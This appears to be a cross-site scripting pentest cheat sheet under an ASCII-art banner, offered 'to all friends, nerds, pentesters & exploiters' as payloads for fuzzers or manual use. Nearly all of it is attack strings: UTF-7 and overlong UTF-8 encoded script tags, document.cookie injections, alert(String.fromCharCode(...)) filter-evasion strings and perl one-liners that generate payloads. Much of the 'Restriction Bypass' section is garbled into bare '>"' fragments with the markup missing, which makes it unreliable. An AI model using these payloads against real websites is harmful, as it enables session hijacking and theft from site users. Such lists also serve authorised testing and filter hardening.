_________ _________.__ __ _________ .__ __ .__ \_ ___ \_______ ____ ______ ______ / _____/|__|/ |_ ____ / _____/ ___________|__|______/ |_|__| ____ ____ / \ \/\_ __ \/ _ \/ ___// ___/ \_____ \ | \ __\/ __ \ \_____ \_/ ___\_ __ \ \____ \ __\ |/ \ / ___\ \ \____| | \( <_> )___ \ \___ \ / \| || | \ ___/ / \ \___| | \/ | |_> > | | | | \/ /_/ > \______ /|__| \____/____ >____ > /_______ /|__||__| \___ > /_______ /\___ >__| |__| __/|__| |__|___| /\___ / \/ \/ \/ \/ \/ \/ \/ |__| \//_____/ Information: Many people have asked us for our cross-site scripting pentest sheet to use with fuzzers or their own scripts. For good results, you can use the following list with automated scripts, software, or as manual payloads. This list goes out to all friends, nerds, pentesters & exploiters. Please continue the list or contribute updates. Note: This is a technical attack sheet for cross-site scripting penetration tests. The +ADw-/+AD4- strings are UTF-7 encodings of < and >, and [\xC0][\xBC] is an overlong UTF-8 encoding of <; they only apply where the response charset is not declared explicitly or the decoder accepts overlong sequences. XSS Strings:
exp/* ]] document.cookie=true'); ?> +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
& &{document.cookie=true;};
< ;
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Restriction Bypass: >" >" >" >"
>"
>"
>"
>" >" >" >"exp/* >" >" >" >" >" >" >"]] >" >" >"document.cookie=true'); ?> >" +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- >" >"
>" >" >" >" >"& >"&{document.cookie=true;}; >" >" >" >" >" >" >"
>"
>"
>"
>" >" >" >"< >" >" >" >" >" >"; >"
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Others: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()} "> perl -e 'print "";' > out perl -e 'print "alert(\"XSS\")";' > out < \";alert('XSS');//